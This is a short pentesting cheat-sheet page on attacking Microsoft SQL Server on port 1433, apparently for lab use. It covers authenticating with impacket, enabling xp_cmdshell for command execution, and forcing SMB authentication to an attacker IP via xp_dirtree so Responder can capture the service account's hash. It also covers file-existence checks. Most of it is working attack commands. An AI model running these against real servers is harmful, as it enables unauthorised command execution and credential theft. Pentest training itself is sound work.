1433 - Pentesting MSSQL

Authentication with Creds

impacket-mssqlclient klendathu.vl/zim:[email protected] -windows-auth

RCE in MSSQL

xp_cmdshell

First We can try to enable xp_cmdshell and then run commands easily

enable_xp_cmdshell   # this enables xp_cmdshell
xp_cmdshell whoami   # whoami command works

UNC Path Injection (xp_dirtree)

we can use xp_dirtree to authenticate to our own smb share, in this case we will be able to get the hash of the sql server user and then we can either relay the hash or crack the hash

# On MSSQL Server
xp_dirtree //10.10.8.85/doesnotexists
# OR
exec master.sys.xp_dirtree '\\10.10.8.85\doesnotexists',1,1

# On kali Linux
sudo responder -I tun0

# you should get a hash on your responder

xp_fileexist && sys.dm_os_file_exists

we can use file excist as well, and sys.dm_os_file_exists to. In SQL Server 2017 xp_fileexist was replaced by a dynamic funtion called sys.dm_os_file_exists

xp_fileexist 'C:\'


# Change this

exec master.dbo.xp_fileExist 'adsnt.dll'

# To this
SELECT * FROM sys.dm_os_file_exists ('adsnt.dll')

Previous873 - Pentesting Rsync Next2049 - Pentesting NFS

Last updated 11 months ago

hashtagAuthentication with Creds

hashtagRCE in MSSQL

hashtagxp_cmdshell

hashtagUNC Path Injection (xp_dirtree)

hashtagxp_fileexist && sys.dm_os_file_exists

Authentication with Creds

RCE in MSSQL

xp_cmdshell

UNC Path Injection (xp_dirtree)

xp_fileexist && sys.dm_os_file_exists